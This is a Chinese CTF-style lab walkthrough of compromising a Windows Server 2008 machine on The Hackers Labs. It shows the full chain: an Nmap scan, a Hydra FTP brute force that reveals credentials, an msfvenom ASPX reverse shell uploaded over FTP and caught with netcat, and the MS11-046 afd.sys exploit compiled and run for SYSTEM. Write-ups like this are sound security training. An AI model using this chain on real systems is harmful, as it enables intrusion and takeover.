靶场:The Hackers Labs
地址:https://thehackerslabs.com/cocido-andaluz/
系统:windows
内容:ms11-046
属于比较简单的类型,记录一下基本操作过程。
扫描端口,开了ftp、smb和http。
~/D/c $cat port.log
# Nmap 7.94SVN scan initiated Sun Nov 24 08:25:40 2024 as: /usr/lib/nmap/nmap --privileged -sV -sC -Pn -p- -oN port.log 192.168.56.168
Nmap scan report for 192.168.56.168
Host is up (0.00048s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.0
|_http-server-header: Microsoft-IIS/7.0
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:E6:7E:04 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-JG67MIHZH2X, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:e6:7e:04 (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-24T14:43:27
|_ start_date: 2024-11-24T14:38:15
| smb2-security-mode:
| 2:0:2:
|_ Message signing enabled but not required
|_clock-skew: 6h13m25s80端口扫不到任何目录和文件。经提示,直接爆破ftp。(这一点设计的不好,上来就爆破)
~/D/c $hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt ftp://$IP
[21][ftp] host: 192.168.56.168 login: info password: PolniyPizdec0211ftp登录,在网站根目录。
~/D/c $ftp ftp://info:PolniyPizdec0211@$IP
Connected to 192.168.56.168.
220 Microsoft FTP Service
331 Password required for info.
230 User info logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> ls -la
227 Entering Passive Mode (192,168,56,168,192,7).
125 Data connection already open; Transfer starting.
dr--r--r-- 1 owner group 0 Jun 14 17:12 aspnet_client
-rwxrwxrwx 1 owner group 11069 Jun 15 16:39 index.html
-rwxrwxrwx 1 owner group 184946 Jun 14 16:48 welcome.png生成aspx的反弹shell
~/D/c $msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2709 bytesftp中将shell上传。
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
227 Entering Passive Mode (192,168,56,168,192,15).
125 Data connection already open; Transfer starting.
100% |******************************************| 2709 47.84 MiB/s 00:00 ETA
226 Transfer complete.
2709 bytes sent in 00:00 (63.86 KiB/s)访问上传的shell.aspx便可得到shell。
~/D/c $rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.168] 49173
Microsoft Windows [Versin 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. Reservados todos los derechos.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\servicio de red
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
INFORMACIN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripcin Estado
============================= ================================================= =============
SeAssignPrimaryTokenPrivilege Reemplazar un smbolo (token) de nivel de proceso Deshabilitado
SeIncreaseQuotaPrivilege Ajustar las cuotas de la memoria para un proceso Deshabilitado
SeAuditPrivilege Generar auditoras de seguridad Deshabilitado
SeChangeNotifyPrivilege Omitir comprobacin de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticacin Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado虽然有SeImpersonatePrivilege权限,但试了几个potato都是64位的。这个机器比较老,试试别的方法。在 https://github.com/bitsadmin/wesng 下载Windows Exploit Suggester。
在靶机上收集系统信息,保存到文件中。
c:\inetpub\wwwroot>systeminfo
systeminfo
Nombre de host: WIN-JG67MIHZH2X
Nombre del sistema operativo: Microsoft Windows Server 2008 Datacenter
Versin del sistema operativo: 6.0.6001 Service Pack 1 Compilacin 6001
Fabricante del sistema operativo: Microsoft Corporation
Configuracin del sistema operativo: Servidor independiente
Tipo de compilacin del sistema operativo: Multiprocessor Free
Propiedad de: Usuario de Windows
...根据系统信息,检索提权方法。
~/D/c $python3 /opt/WindowsExploitSuggester/wes.py -e info.txt -i "Elevation of Privilege"
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2008 for 32-bit Systems
- Generation: 2008
- Build: 6001
- Version: None
- Architecture: 32-bit
- Installed hotfixes: None
[+] Loading definitions
- Creation date of definitions: 20241123
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20110614
CVE: CVE-2011-1249
KB: KB2503665
Title: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40564/
Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705
Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705
Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: http://isc.sans.edu/diary.html?storyid=9988, http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/
[-] Missing patches: 4
- KB2503665: patches 1 vulnerability
- KB952004: patches 1 vulnerability
- KB956572: patches 1 vulnerability
- KB2393802: patches 1 vulnerability
[I] KB with the most recent release date
- ID: KB2503665
- Release date: 20110614
[+] Done. Displaying 4 of the 208 vulnerabilities found.第一条推荐的方法就是MS11-046。kali自带pwn代码。
~/D/c $searchsploit MS11-046
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege E | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS1 | windows/dos/18755.c在linux下将其编译为32位windows可执行文件。
~/D/c $i686-w64-mingw32-gcc 40564.c -o pwn.exe -lws2_32ftp上传后在shell里执行,成功root。
c:\inetpub\wwwroot>.\pwn.exe
.\pwn.exe
c:\Windows\System32>whoami
whoami
nt authority\system